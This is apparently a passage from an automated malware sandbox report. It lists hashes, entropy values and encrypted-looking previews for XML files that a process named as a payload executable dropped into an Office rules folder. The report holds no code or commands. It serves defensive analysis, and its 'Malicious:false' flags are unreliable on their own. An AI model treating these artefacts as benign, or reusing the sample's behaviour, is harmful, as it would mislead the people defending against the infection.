                                                                                                      SHA-256:FA79889E2BD0FB108074BD3E531169C1F41B6B5ACADFA802A8137C4B9C30DFB9
                                                                                                      SHA-512:76D0E35DF91397EA3F111B3823458A0C476B077E2648BC1B6617B3828C2682C557614F763DF223B6F571ECF79621A37B792B12D039E1D41FBC72DCEE110FEBDD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlM..).Z.;2.D..\..}..tME.=.5H..y..*[.&.x....>..4R[.k~......?.d.g.........2W....!.X..W.w../Z$..../..>U/wM..........q.<.k....q..I/R.1:D.A..o&...{.h_=......F1..{.|te..'....\f.....{~P...'.._.../p....H.T<....k2....?!be.V.[.E.x.I..hQV%.op.>Qy.._.#F.\.".....3.~...+. .B..w....h,..`...P..c......pL..I..sa[.oge..c.)_5.@.&.M)Mk....v...T..\h]F5...k....f......,..d.wBq*..y......^..Hz......>..y.XS..p.c.5.....2.m4*}.........h.2..diK..7H.<.l.V ...[S.?.?\.WB..T..%.\..M...W.-%G. ..\.[....r...PB.F)...l.K...U"a...h..z.X..".%..|.;..Y...o`..t.i....Fe.:i..jD.........N....n.8m.^8..q.&.Wp.}V.|.A&.K.UB..f..,.GF..%.N..N..3`..V.......m...J.]...6..I|Kyg...&*Y..g(b..V.....SJ...*.m9...I.9.i..$..........>Yt.|W.....?\.....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120627v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):737
                                                                                                      Entropy (8bit):7.70943624768575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:WTA5yiYRj6zACSED2F4bqUwev9NlMNnpafRKP6uoUl0jAa7+ADfnxecxHk5I4zLW:WTA5/ECiqTwev9NlKnvP6uorjALADIcj
                                                                                                      MD5:B73BB87A0C1E59BDF32661983FE4424A
                                                                                                      SHA1:AAB4E87868E6BEBCA354AE7275D25CE990C4D6E6
                                                                                                      SHA-256:21320F8AA2FE5D7A484575950A81F5EE90D0597340530EB359CACFB338156681
                                                                                                      SHA-512:988ADCABD6BEB783089D27C8A5143419AA34EC3A01063F0B7F9FF9D0F7B9297396B6ABE630784CF7AC629A3B15298589B7C394A8ED3CB29C89A6FC26478C0916
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlF....69E..K......._:. {5......(...bA..u.....@'.T.|..\/Sr...R}.t.......e.xh....(W&...e...)....H.2<.v!.<.{.......B:....c...'...|. ....l,:U$...z....m.t.:.p..Q......S...a........(..s..Vv......)..3.dm.kz......g..|i5..*...,}.8.3.%-c....A..../...]....k.D....R).s.y..F5......3i.|..o...C.&^..BP:....t.......n.e.l..5...v..X.4.*...;n.2.......I.yw[.0N..I..U..?|p.y?...F.n....}.)......"&.F.q;...R"p....643..C...B....y..............w...D.z......t~.k.p..z..N3N...a ?.N....'Fn...`...Z..Z..$.h...\...,5...y!$./...E...2\.z.Y...../.X5.W.*.p.d.VP..U.....C:.^]j...#..&....%^P.G\.^..V..&.I.>..?...f..).\...a.....K.@.....U.[R..G....!.b...5.i7H...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120628v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.733801885737672
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ptlj8RI92ibmsWtK6LDOr6k9n1rSi15v6bD:pvoR8axQWOmWrSi15wD
                                                                                                      MD5:A9633A7489328916A3D6CC3E8978C62E
                                                                                                      SHA1:A21492784F1884D60104BBB0F88EE184372E422C
                                                                                                      SHA-256:C7B5B6D4450E00E473C86153AD586FEA607C6ECD8C5CF44AE618C41BC13BF58D
                                                                                                      SHA-512:4C5B81BFA4C7DA49EECD87A0A46DE1BCBA1045220B7BF1BF1E38710CD476543CC9BC81822FC13C1758FBF050F99B03DA3F4C92C393AC2B813E1B99B3726E3D58
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...c......)...7...5.........4Uh..Q..B..l.\.vg....[..f.....P..QT..R..K..D;.@...:..f..r'+.6f..^.C.o..O.......|pvu/.?p.t...#..;...k.....T.0Z".9%..'...=.....l.;..{..wU.0....1..$.)3.?.O..C..S..[.*...,.5.a.v..H...w.6.Q.ce..P....G......../..eM..G.....^.....W)sYX......q".1.]....k..S...>n..f.@....m..z[.2x0...K...R.T...:..0W?...;I.m..:.N.;m....DI..h....,.,....Ev..Bh......#3eZ%..........q..'.+...&S.G..Lkp.Ry..(..jgt"......anZ.ror..e..Ao.J.v.(b...FJ1`.f2....4..BP0.......L2.G.v[.M.f.0..V.n...Z^t)..t...@..H...TX.v.(...z...F...6....O..9'..b..>_....k......Wh.;....T..zID....gw.H...jWwR%......7....6.8......V...J.`....}N.W.4..5......?$.*+.<GRr.Q...u.z.^..n...&&.JZ....\.jP..E...4Pb.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120629v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):761
                                                                                                      Entropy (8bit):7.675962087075262
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:BcOrIHfvvLYMpu5JUtaXT0+fgWfcTslLRDQOvpay8c1+gYmmtWzqoD3iRv6cii9a:BbOvKXUAXx4WusoOBf1+bmqoD3iRv6bD
                                                                                                      MD5:FED8432A611F58C765F83F395A9AA00E
                                                                                                      SHA1:492F17F940FD26BF7E9DB03F4ECFF43EDE036B16
                                                                                                      SHA-256:609179E46CB3BDAF09CEF47AEEEAC60089F701E7388C16654145FA3BCAA60109
                                                                                                      SHA-512:3E5B06C70FB5325820C0A2AF422C48374D4916DD0EB82A4F66F9AEACA4F8EDFC4A2EF373F02CBDC610F32A9CA5919B96DCD4A44B73643EBDD1B91C388C5FC578
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml(....v......p..t..f.U...i......(705 /D...l`2".|.....c07......UA...`....eP;..8=f..c ....l.?.\#D...*...X8..W--%.{2}`.NM'.....&......................d..m..aU+.z.d[.&....(J.!I.aK...{2.y.c.%.6...a.\,...h........!A>f..Ba@"..#..3w.G......'.Dp.1E...........BG...r.....4b..2S.'.C+..Q....\U7`K...x.7-E.4..,.A..^.....1....R...j.KG.#.^..d...H......kQ#1*...C..9....q...... ..&v.vaw-QA...N..L.....DY6...SfA.....7[....z[ .RAAQ...ze.TF.............=%.%.{.s...O+...f.0O._..G.E.3P8iE.5.9.%M\+..l.......zZS.-.....Uy8.d.B....@...0.....g..H...o.t...u@j......G.Z.$l......r.x.fsm.X..>.1.H...!....._.G@U....C.B.i.q.kM...m..,e=..2..Z.CLm^.n;.5.-X./Wo.@.K..I=*..,....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120630v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):832
                                                                                                      Entropy (8bit):7.73578472164141
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Pluil/96H54GZo5t42ejuokgmrxuXrH5EFrIcEaCnaAdw7VZ7LDDuQ9URbktnL4F:YG/WlC5tFGHYTAhdcVZPaQe6L4Afv6bD
                                                                                                      MD5:B57058EBB163061C6FB64A6DFB2238E8
                                                                                                      SHA1:BD95291506B1A044D771C8D56816B013466D604A
                                                                                                      SHA-256:B1850339879BCE73EC08A6D282EEC7AD94B1B3C62EA28390CF39AE1C43D00CF0
                                                                                                      SHA-512:78FB44D5CAC081C79A7CC7306B6A44A893F92D2D631B23A8F48E7F2B55C613CEEC24229E0C51DF3E96E14E99799D54258D0CE8FD10D8E3DF34A18D087BF7367D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlfo&>.....O...j.@0....e.H.".'..9..G.BSq........0.W.f...Q...9.|....Az.h.."...vD.....K.&K.|...(2...Y..2.'.3h"V.. ..".}E...F..kG......4F~..*b...G."R...;.=...~K.KVC0.9.a.~v........5..&.&>!..<.|.+.Y.:@.k.lg;.......Rv.... !.....|W.....[.0y..0..#x.r.}n./.oY`7.1..~.(nF..(M;.\....rhS3...v.X.c...:..0.y.U}...o.\..@..cy..S..z%\kx.l2;._|.5..]`l....o...n..K....zH..c+............$0.z.....B.`....X...B..j..i...w...._.tu...^ZKz....$....#oY$.._..-H.k.e.e<.*N.B4.....F....)<...)R_{+.._D.~P.....f.KO..?w?...p...oSL.......AD..|......*x$.a..x.Qx1...D..VN[%9.C.g#.k.Wk......S.7,0...v..c.H..}.......wk.......M._&../..D....$4H.t.,.7..X..u*:.$....s)....19.R.....1]..-..?....6.....).s.uh*|..7.~..n.....a.[.i....U..._....../...g...%Z..0.F..\j!w=.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120631v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):7.754261305629328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:fGP9l28+CYFr/dlLnQ0AUqDlcfU8edHFkS+Gz+V9FQhpWGNnHGWx9yLQv6cii9a:fGi8+CYFr/dlLQ6AGfredCJG4PLGBGWG
                                                                                                      MD5:2CA46937CEDFA409936B9EB9D44B3843
                                                                                                      SHA1:699C37056D71A4783D6CB47EEA94156D1CBE89E4
                                                                                                      SHA-256:CF2C833B32947653B2F6EEFFC033462282379C7C2ED0B98A5AF75957DA1DED8C
                                                                                                      SHA-512:46A5AAEA54AACCDB92281442776A1DA62C6049DDA0069FEC5EA582AB7295F343712ED4D9A00722C35DCC4658CA82634DF087207FCEA280FAA7B3F7ADA47F80F6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......<...8.;......5.._F....-.....(....g.s.....n.......-....K.b... Y...Z.:.k..K..a......t.d..y.4...3..O..vs~.n.0.a....W:..$....i'.m..,..=X.uC.$S.i:<b.z.@..f.K..L....G.wS..n.c.q.....p3li.O....>..'3.z|>.tF,.....P(._E.!1(%>.q..XM.h..GNIf.@...Q..i;..8..Ne....~G.Y.5.....:.<."S...X.J.#(QP.p....|.n)..Y..&...pU;.......).7.......E.....<.w...g'V;(..9.kZR../D..:..x.Q...m.nrJ.+....;.....U...,m.6.n...5..#N#~7.F...X.G...._>...`2.D...1..N.&.[s...}=.\J.d.59.6...6....v..U.V..h..=..a.J$d.n..{B.....lO....."U.....V...9...e.^R.|.,......M4..@.K.V].z...'..-f....:9..[..^....<.......7.x....Qs...sc...@..f.q..%n2..!]/f.KO$.-U..'....%_(hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120632v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):804
                                                                                                      Entropy (8bit):7.733354246272052
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:crnKu0qGx7eyAlv3WzIJaV67ZX8xDDLT55+ndhCpvVxHXs8Gyubz330EU7v6ciik:e0qYh63yLDDvcdhCpHwyAbk7v6bD
                                                                                                      MD5:346D9AE8B38F7B667E3B25AC45171591
                                                                                                      SHA1:C98A6817D65E5A277D32C148EBCB53FE8543FB15
                                                                                                      SHA-256:9ABA1DF401E337F9EAFBB0BCA386051A789FDF0D7C63AB0C4C1FEE655142A562
                                                                                                      SHA-512:E3713F8F0A388536C2AF3504609A30B3392225B5DF6F14E565700761B6509982F45373A63631D58323B17EBE6ACEA02371B06C935FBA244900AA50752CD736C5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml!..u....lN....d..#w...I.......\....F..........$.t&./...P.:...QN.....DB.w/.6....B;...l.....*.."OZ..x...os{.w.....c.Z....D...gif..8A..........?.k...T....R....M..q.Dr.........bg\....6.b.b:.KW.{1(..v];....$..?...@..z...R.....7;.t.2WH.?.YZ.k..u.6.Eh'...s...t...]'^^(.a...F<A.f..N 7....qa..9.K=.=...3...l...F.H..h.f..k...}.n. 4..m...u...v..7P.3;...:..IB....O21.....I...b.Z/..}..>V.\|.=~.kh.4..L.....:.,..[..:..Z.....w..}.....?5.*....\d.H-.....t,......?:2JP.'{$O....^..I@.J>.j.....j.`..Oh;..hq..;J3.$i.].......... .{`X.K.........L.a.U..9.kr".4.j.....5..v...6m.. ........n.AdR......i....I..r..|%.......W@..9QBp.YH...n...`#IP..3..#.....>..=ga.k`....=c.X~....Y......R...hJ...t.r.o..M..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120633v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.7134444519408305
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Iv3Huc+Kqz0VvYs51zTOd4a2mRijvf7rlN58BDvEtTQwjir/a5LFMkinv6cii9a:IvOcKz0qWBayjpN6s3FL8v6bD
                                                                                                      MD5:166D1AF146D087ABE7677CB1BE952FEC
                                                                                                      SHA1:8AE59BEBFDCD2E5AA917CCBFD523F868310D2820
                                                                                                      SHA-256:94970F4508307239DBA3FC2E98F35266FF24044AE1147369962CAAA8030C058D
                                                                                                      SHA-512:E6EEF653085F46E0EC40CB278FC5AB02442C7508365213AAE9CE67CFACE0CA44FDDBEBF6BD2D425EFC212E098FF7AF3855B1C633664C2034A5413436C9E9392C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.../....`.....s..A.J.4.l.......-f.....a....z...n......:).8.;.......Q!.......4Fie2..F.....v@...O.".8.2......s#.N.K.._.8jkV..{W...,..nA.\.(.'.r...n.ZT^>vXS0......t._V...F?......a.^C..r.......P.!.0.x.&.P...;.........S...;,Wx:.!.Q.3["...}.l.....{R. ...Lp>8...2.]........"...z..^...>...T..gS;....-.yx....}........x./v6*.$...lg.........E.X..0..|..nu.m3..P-.<..f..i..r*...:....w?O....v..X..b2.7...`."...v..a.N1..,ZI.W....o."...g......<..E7 .6..x.U.H...V..(.<...9.}n.*..1.aook.=C.T#.*..P.%.....F..<.D!.?..Sa&.U..@.......J?.N...#{?.s...D.g.."....*..)..g.2............%.@...w.C3.......|..u.u.:>).=D7....~?..a......q.......G.4..(_."..<ES.T4M.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120634v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):827
                                                                                                      Entropy (8bit):7.778597680904985
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:nb2pdoC6jQGPa2s+jyZJD87aKUBtZLcUBgHqubWj/Rm7dsyYuVNwv6cii9a:niBYat++07aPB7ZGvWbCiJuVNwv6bD
                                                                                                      MD5:DE5DC6CBDF7076B0097813CA77C2AC91
                                                                                                      SHA1:5D7A033F7E91DDF12342803437173B36DC6CCF34
                                                                                                      SHA-256:A8F5C9E2564AD9697D9424A15F3C9516C8D94975FAD06D2C580C52FDD5A259D6
                                                                                                      SHA-512:F3E99C9A4BC6E642902EFF35EC9AED2689B7341D760A1367DF157B0D3B5872015A0DE13A48B00B2A61455AC15D490589471E5E452C54259456A4225DE6FC5343
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml~..P.....`r...@..]..Rz..............=N.Q..^.Sd.n.0.j:..(....$.....^.\r..|..O...)...Z...m.-.....He.C.<.}.j;..*k.x....&.k)....~y..p..O.A..7.....DW-.#.v#...x.8...Wr,......>..c..`;..m..=#e.'..l..#'p. e./..r....HT...%......W.:E.....L4C.u Xz..1..P....... .....n..0-..d..jJ..v.6.8K..z'Y.R.gL..Spvif."....|.&....2...O..".9..'.X.mB..4b.qq.....G_.DZ.$S..3h...1w..-A.].D.|._.e........D.. .,....F...B........h......Q.3c.?.j.[...|.z..qW.2..`....`.\t............Ynk+.O.jV..^..k..+9...\O.-..3..n./.....N..x......}.U.....(x..F\.....w...bz ...r...+.$.C+......{7...<..........*>..*C..NG}.*.U.%.75@>z...i~d($.....w9.iD.s6!..p..8.1"h..(.Y..!s..Q.\..U.].b<..........#)p%.ye..........0.l....\.....^.R&z$..H.. [X...*....M7u).F....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120635v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):753
                                                                                                      Entropy (8bit):7.658229053597793
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:pIk42uJ0yHPrMum5HVJn7YyFtVXu4BltdVPis/Vd4b60exWootFXqrxDPpA40Xpy:Ows0yHu1JYy1rdVKudn0vootF6NDhXmy
                                                                                                      MD5:A4F3FA30F81E2326128A2B50CCEAFBBC
                                                                                                      SHA1:368AEF7D63233B9E3BD8FBCBC9425DCF04914C53
                                                                                                      SHA-256:B2AE5C63B83F38F7E86F2B91276283202516A6891DAA683A50BCFC701CED5582
                                                                                                      SHA-512:328A118863171CEEEFA84C74C91860AA13ED9AA1B456AD5B8DC681BD490D4002A34085173CDB5FC930BCF24F7070BC1442B911534D608AFFCF03BF33F934262E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..{.....s.[...nH...S..........y..m=l..=....>..c7#.Mhx.`.<.r......G..F..i77..G-..4.....*.....d..W...b.<YI...C...e['K....Y%.B.>.%..m.No..f.;..w.. .Y...%q....J5.I....!)..../....7Ms...A.cm.R...ns...m........]....[.....b.E_...5...v...M.7..C......;P0....R5C.[.Y.IL.........qe.k..n...............E.a..... J*Z.|C......2.....;?.X-Y..`.....A.......|.s..A...{..:....-.3..._.2Q...W....'Z..5...K\...Vs]..Y>ET..3.....i.'V#K.b....v;..t?f...q^.....?m..C.7...r....:.g.....{.TD.._J.|/?..i&.w..qLPZ..Wo..iN.J..#2...E..q0...5..v .a.V.}=M...X`..INU....i<..%..\...UOer...t.>..1.d.n...AC..0..._...F...U..b^......._L+.E.s`y...h..../....qYbx.C.j..-=.d$.._(....RhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120636v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.714906817236498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wBBDm8CcOYqgqi7JAF4CkPCMf/cj5Sh8v6bD:wBBD/CcOArFB8wD
                                                                                                      MD5:F864D4C47EB59FAEC3DF7CE01AFFC35E
                                                                                                      SHA1:3E66193B89887BC217D5A0A563789446BAC8253B
                                                                                                      SHA-256:996AD77CA312238C0E87FDB0D0244EE3F7110662E340C6708DDBA3A008D0BDD9
                                                                                                      SHA-512:1366A9F68E39F1916D221E90BDD55666DF24AFDDC36A8C0ECE30C6D52F6AA4AFD1DF695B4E7FB41939D01E0A4FD46C5776B120F73F20358671D0EA1CC63C4895
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...,...w~.e4...EeC..A......p..;...r..u...xU.U...1...9m.._.....!..P.f&H.......0F...i.a.tA..w.f.."h%DU.f.MBTM4......D..p.`}....Bb.o'....b....8clc.s.R._.w....>.....O.j...t._.<......e.,".Wi~..,.OJ ..h.D..L.{....i..=......G...G.!.......C....p.~..#.4.r.d.........aK.h\k....&$.....H.|.................N..8=~....e.T..?...H<.....V.W.l..h..V......l.P....L../${y-;....3."M../I]r$(?.*;.=..+....9...X.Q..*....|.?uM....)~.d.]P..-O..r.]Rl.g.I&..T ......N...j.,.d..N.V.>..e....RE...|T..8.$.,...c.-.8..0..@...{.Q../.P..":....pJ[.x-.78...6 .ZT.....dt.^.....7.#j.3...??.\..Kp...j8I]BtM....(.In..&....0.E_#..8.....-..H...~j...[.-...848.w..X.9....u_.R5.,};...$.....1..-.{7.~U...Q.%...J....8B.......ZP.5...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120637v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):760
                                                                                                      Entropy (8bit):7.6963335104711055
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:lo3nsFcyvPmF52woJ8a4DDOhHb2FOGshFNTGrWHbXn72fQP6iZev0uTE8Urnv6cq:63GgQxJ8a4WNb2MjleaXn72jvcEwv6bD
                                                                                                      MD5:70B1EDDF7E4412E56D5548A3311363B7
                                                                                                      SHA1:0F6A69F65AC355A7D2C395EC9DFBA15CBA023082
                                                                                                      SHA-256:7955B87D1143D9BB52C1A04DD3D39E65AE4FAC954B3220EADC084653BD8FF006
                                                                                                      SHA-512:C48A74C326635CAE52551370A3F01DFB845D416B432569562C12B29194BE7916D566E5A0BCF92D758DD32E884BA0EF16C3B77D772BD32DBA19ED968C43BA16CB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.8(},_...${.Y.].+.......uj........].)MH...Bd.........\v.`k..D.K......YL...Sd..~._..u..6C]...S....f.+...,"Q.....9..-..19..OA....Z....d.k@......o.RR..1C...[.._m....$...;A..rL.m.V._.)......Ng....`M....X..%....1V.Y6. *.h>s4......N.W..Mm..P...G R9..fA....(H_S..."..m...[...o.z....q..s~c..s.... ..F..K....b.-9./.{.....tm@.WH.=t.^Z.9...R..l.`..Hf..j....... ..a%i.4...A.......U#.u.Go.7B.,C...D......g.V.b..K9...R.z-.......0.Z.h>C.H.7...`......X.N.lP"......F..C.s..a;i.._..%..A...2.Z....S....8....`%....V...F..c....-....0..l....N.....U...Z.Z.yt.\zHa-....5...ZH}..$g...|.+..M....+.5tf.}{?..6.../FfI.Fc.#....i.....x.G.....V..m.wP.+k.V..`.v|.....t..y ..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120638v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):819
                                                                                                      Entropy (8bit):7.715044249766661
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:wMNZBngPWO1dhmmD49bRoIPOn1sfjCNd6aAaOjpZF9JKJO9GMv6cii9a:wiNg41RjNfjCrH8lpJiWGMv6bD
                                                                                                      MD5:CD79AE89CBB6B3688E944CC6B28824C1
                                                                                                      SHA1:5F6DAD656AB99946AB46ED6B37782A6C8C566117
                                                                                                      SHA-256:E2B3C1BB5E5568C7ADBF2070422EE52953323B3479975931B7A6156A554AB95A
                                                                                                      SHA-512:EBDB0E371D5983A4DB5EE0C70E536C99A5B1F64DCBAC822E9DC6414928F70B2BB3D02920547833EEDF171F934E7C97645C4B6D58D6B4DBC53DE64F7090F53291
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Q...u....D....h.W6!.&.C..);.<g.}...ck.h=+.9..2..[...r.....2....&.k...].".=.)K...9......U=....h...g.......1..T#.....T`..nOHB....._.......)K.`-R.|..Pw+..}.x...Q........"a9..p..*.s."..0....3.-.VY.3..`BI.O}....S.P.....M....pV..=.....'4..W[;.o7...lY?....f.Sd3..x....{7n..p.....=x.4..y.....C.vb.w..&7....J............p.z...b%=."....FG.O..#.(^.(.(X.8.......D...d.p.D.V.]..l.|zhI..(.W..5z.J..dK.D.....BP..>.A0.8..c.G...P......3.Yw...4%7CD?.h...L*....p.....8..my.Hw.&*..j...u..!u..K.19........j0ga...l?...9...F.k...w.......Td}......M).1.Qj...^...W.p.4...JGA.X... .[a.....(l.J.. 2.....<H..\...5.6zr.= ..2../#.qOV.1%q.5-5.[K..W-.../..?..../...]n...F|V..V.....J...G...+`/|...H......w.V..W.x...dAE....=..dqhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120639v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):756
                                                                                                      Entropy (8bit):7.696361669820699
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Tugp0AHVUzRCBt58zckDjE5i+ue8G7gly075S934v3W5BdIvheaDikbYv6cii9a:Tvp0IVUzRnzc6jExuQ7+S9dBdIPnEv6X
                                                                                                      MD5:E95B39B0D07AEDBA4872DA1BC05D2C33
                                                                                                      SHA1:C730105E3A033BD598BD311966A6FD3BDCE8D13A
                                                                                                      SHA-256:4259290A00B226AB944BF5C092F73E9CADC9C3616FFD8EF4F174D858116439D6
                                                                                                      SHA-512:08E66C8CF22363457FBD62D18592E6334D30399EB605A26E5FDF7979E7F46A0739595AFB34A4B37026EFC45BAE1F1C16D0B5F9B37D62A0CB9F5840C9661FAF77
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.+.KE.(...@">.T....{.5...[......$.].......C...>.8..(.l ..r..v....\....s.h...N..9H......l+i..+..B...-e$....t8.,.....k.....O.....[O.+<.....6.&...>J&..x'../x...o......iny.w..J....>...EN*.B...p P......)@.Oz.w.T2?l......C.2i....S.4....r...)4..A...d..O@[...|.>...e#.,....".......h.eT^Q.lv...5,...l..2..8.6.&...^xl"N....`.J..8..s....$..U...;]....RF..fX.....+.T...]F../}.!.k'.;iNT5.._.<..$.v.o.........s....bH.M\..Z&..B...qwMS..I.j.hqQ....`T\].......y..]r<.QA.M...3.>..{$Vj.....e.C..,.Zn.*m....-80.....a....A.9.F.....RjOz-.8....-...m...._D......u.."l.h.....o...4.&;...6..W.w..o.e......4.^oa..).B.....6Q...X.;..`...S...............V.+......Z..(..m....3.LhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120640v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):811
                                                                                                      Entropy (8bit):7.7256319078410165
                                                                                                      Encrypted:false
